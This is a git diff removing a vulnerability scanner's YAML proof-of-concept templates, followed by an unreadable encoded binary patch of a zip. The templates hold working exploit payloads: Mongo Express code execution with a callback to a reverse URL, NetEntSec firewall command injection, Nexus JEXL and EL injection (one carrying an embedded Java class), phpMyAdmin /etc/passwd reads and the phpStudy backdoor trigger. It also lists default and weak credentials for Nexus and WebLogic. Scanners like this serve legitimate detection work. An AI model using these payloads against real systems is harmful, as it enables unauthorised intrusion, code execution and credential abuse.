method: GET - path: /storage/logs/laravel.log - follow_redirects: false - expression: > - response.status == 200 && (response.content_type.contains("plain") || response.content_type.contains("octet-stream")) && (response.body.bcontains(b"vendor\\laravel\\framework") || response.body.bcontains(b"vendor/laravel/framework")) && (response.body.bcontains(b"stacktrace") || response.body.bcontains(b"Stack trace")) -detail: - author: Dem0ns (https://github.com/dem0ns) - links: - - https://github.com/dem0ns/improper diff --git a/WebScan/pocs/mongo-express-cve-2019-10758.yml b/WebScan/pocs/mongo-express-cve-2019-10758.yml deleted file mode 100644 index 6d64293..0000000 --- a/WebScan/pocs/mongo-express-cve-2019-10758.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: poc-yaml-mongo-express-cve-2019-10758 -set: - reverse: newReverse() - reverseURL: reverse.url -rules: - - method: POST - path: /checkValid - headers: - Authorization: Basic YWRtaW46cGFzcw== - body: >- - document=this.constructor.constructor('return process')().mainModule.require('http').get('{{reverseURL}}') - follow_redirects: true - expression: > - reverse.wait(5) -detail: - vulnpath: '/checkValid' - author: fnmsd(https://github.com/fnmsd) - description: 'Mongo Express CVE-2019-10758 Code Execution' - links: - - https://github.com/masahiro331/CVE-2019-10758 - - https://www.twilio.com/blog/2017/08/http-requests-in-node-js.html \ No newline at end of file diff --git a/WebScan/pocs/netentsec-ngfw-rce.yml b/WebScan/pocs/netentsec-ngfw-rce.yml deleted file mode 100644 index bff8b28..0000000 --- a/WebScan/pocs/netentsec-ngfw-rce.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: poc-yaml-netentsec-ngfw-rce -set: - r1: randomLowercase(4) - r2: randomLowercase(4) - r3: randomInt(800000000, 1000000000) - r4: randomInt(800000000, 1000000000) -rules: - - method: POST - path: /directdata/direct/router - body: >- - {"action":"SSLVPN_Resource", "method":"deleteImage", "data":[{"data":["/var/www/html/{{r1}};expr {{r3}} + {{r4}} > /var/www/html/{{r2}}"]}], "type":"rpc", "tid":17, "f8839p7rqtj":"="} - expression: response.status == 200 - - method: GET - path: /{{r2}} - expression: response.status == 200 && response.body.bcontains(bytes(string(r3 + r4))) -detail: - author: jingling(https://github.com/shmilylty) - links: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g \ No newline at end of file diff --git a/WebScan/pocs/nexus-cve-2019-7238.yml b/WebScan/pocs/nexus-cve-2019-7238.yml deleted file mode 100644 index 69d5bc4..0000000 --- a/WebScan/pocs/nexus-cve-2019-7238.yml +++ /dev/null @@ -1,20 +0,0 @@ -name: poc-yaml-nexus-cve-2019-7238 -set: - r1: randomInt(800000000, 1000000000) - r2: randomInt(800000000, 1000000000) -rules: - - method: POST - path: "/service/extdirect" - headers: - Content-Type: application/json - body: | - {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'expr {{r1}} + {{r2}}');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"} - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) -detail: - Affected Version: "nexus<3.15" - author: hanxiansheng26(https://github.com/hanxiansheng26) - links: - - https://github.com/jas502n/CVE-2019-7238 - - https://github.com/verctor/nexus_rce_CVE-2019-7238 - - https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2019-7238 diff --git a/WebScan/pocs/nexus-cve-2020-10199.yml b/WebScan/pocs/nexus-cve-2020-10199.yml deleted file mode 100644 index 7ce9fa7..0000000 --- a/WebScan/pocs/nexus-cve-2020-10199.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: poc-yaml-nexus-cve-2020-10199 -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: POST - path: "/rest/beta/repositories/go/group" - headers: - Content-Type: application/json - body: | - {"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ {{r1}} * {{r2}} }"]}} - expression: | - response.status == 400 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - Affected Version: "nexus<3.21.2" - author: kingkk(https://www.kingkk.com/) - links: - - https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb - - https://www.cnblogs.com/magic-zero/p/12641068.html - - https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype - - https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31 diff --git a/WebScan/pocs/nexus-cve-2020-10204.yml b/WebScan/pocs/nexus-cve-2020-10204.yml deleted file mode 100644 index a08a2bb..0000000 --- a/WebScan/pocs/nexus-cve-2020-10204.yml +++ /dev/null @@ -1,20 +0,0 @@ -name: poc-yaml-nexus-cve-2020-10204 -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: POST - path: "/extdirect" - headers: - Content-Type: application/json - body: | - {"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{{{r1}}*{{r2}}}"]}],"type":"rpc","tid":28} - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - Affected Version: "nexus<3.21.2" - author: kingkk(https://www.kingkk.com/) - links: - - https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb - - https://www.cnblogs.com/magic-zero/p/12641068.html - - https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31 diff --git a/WebScan/pocs/nexus-default-password.yml b/WebScan/pocs/nexus-default-password.yml deleted file mode 100644 index 5a27c24..0000000 --- a/WebScan/pocs/nexus-default-password.yml +++ /dev/null @@ -1,22 +0,0 @@ -name: poc-yaml-nexus-default-password -rules: - - method: GET - path: /nexus/service/siesta/capabilities - expression: > - response.status == 401 - - method: GET - path: /nexus/service/local/authentication/login - headers: - Accept: application/json - Authorization: Basic YWRtaW46YWRtaW4xMjM= - expression: > - response.status == 200 - - method: GET - path: /nexus/service/siesta/capabilities - expression: > - response.status == 200 -detail: - author: Soveless(https://github.com/Soveless) - Affected Version: "Nexus Repository Manager OSS" - links: - - https://help.sonatype.com/learning/repository-manager-3/first-time-installation-and-setup/lesson-1%3A--installing-and-starting-nexus-repository-manager \ No newline at end of file diff --git a/WebScan/pocs/phpmyadmin-cve-2018-12613-file-inclusion.yml b/WebScan/pocs/phpmyadmin-cve-2018-12613-file-inclusion.yml deleted file mode 100644 index 20a73c0..0000000 --- a/WebScan/pocs/phpmyadmin-cve-2018-12613-file-inclusion.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion -rules: - - method: GET - path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd - follow_redirects: false - expression: >- - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) -detail: - author: p0wd3r - links: - - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 diff --git a/WebScan/pocs/phpmyadmin-setup-deserialization.yml b/WebScan/pocs/phpmyadmin-setup-deserialization.yml deleted file mode 100644 index 7bf691e..0000000 --- a/WebScan/pocs/phpmyadmin-setup-deserialization.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-phpmyadmin-setup-deserialization -rules: - - method: POST - path: /scripts/setup.php - body: >- - action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} - follow_redirects: false - expression: >- - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) -detail: - author: p0wd3r - links: - - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 diff --git a/WebScan/pocs/phpstudy-backdoor-rce.yml b/WebScan/pocs/phpstudy-backdoor-rce.yml deleted file mode 100644 index a8bb748..0000000 --- a/WebScan/pocs/phpstudy-backdoor-rce.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: poc-yaml-phpstudy-backdoor-rce -set: - r: randomLowercase(6) - payload: base64("printf(md5('" + r + "'));") -rules: - - method: GET - path: /index.php - headers: - Accept-Encoding: 'gzip,deflate' - Accept-Charset: '{{payload}}' - follow_redirects: false - expression: | - response.body.bcontains(bytes(md5(r))) -detail: - author: 17bdw - Affected Version: "phpstudy 2016-phpstudy 2018 php 5.2 php 5.4" - vuln_url: "php_xmlrpc.dll" - links: - - https://www.freebuf.com/column/214946.html \ No newline at end of file diff --git a/WebScan/pocs/poc-yaml-weblogic-console-weak.yml b/WebScan/pocs/poc-yaml-weblogic-console-weak.yml deleted file mode 100644 index 99b5151..0000000 --- a/WebScan/pocs/poc-yaml-weblogic-console-weak.yml +++ /dev/null @@ -1,29 +0,0 @@ -name: poc-yaml-weblogic-console-weak -sets: - username: - - weblogic - password: - - weblogic - - weblogic1 - - welcome1 - - Oracle@123 - - weblogic123 - payload: - - UTF-8 -rules: - - method: HEAD - path: /console/j_security_check - follow_redirects: false - expression: | - response.status == 302 && response.headers['Set-Cookie'].contains("ADMINCONSOLESESSION") - - method: POST - path: /console/j_security_check - follow_redirects: false - headers: - Content-type: application/x-www-form-urlencoded - body: | - j_username={{username}}&j_password={{password}}&j_character_encoding={{payload}} - expression: | - !response.body.bcontains(b"LoginForm.jsp") -detail: - author: shadown1ng(https://github.com/shadown1ng) \ No newline at end of file diff --git a/WebScan/pocs/pocs.zip b/WebScan/pocs/pocs.zip new file mode 100644 index 0000000000000000000000000000000000000000..9e8a1be761ef4723e27f9e4b091c63274dcdbec7 GIT binary patch literal 89914 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 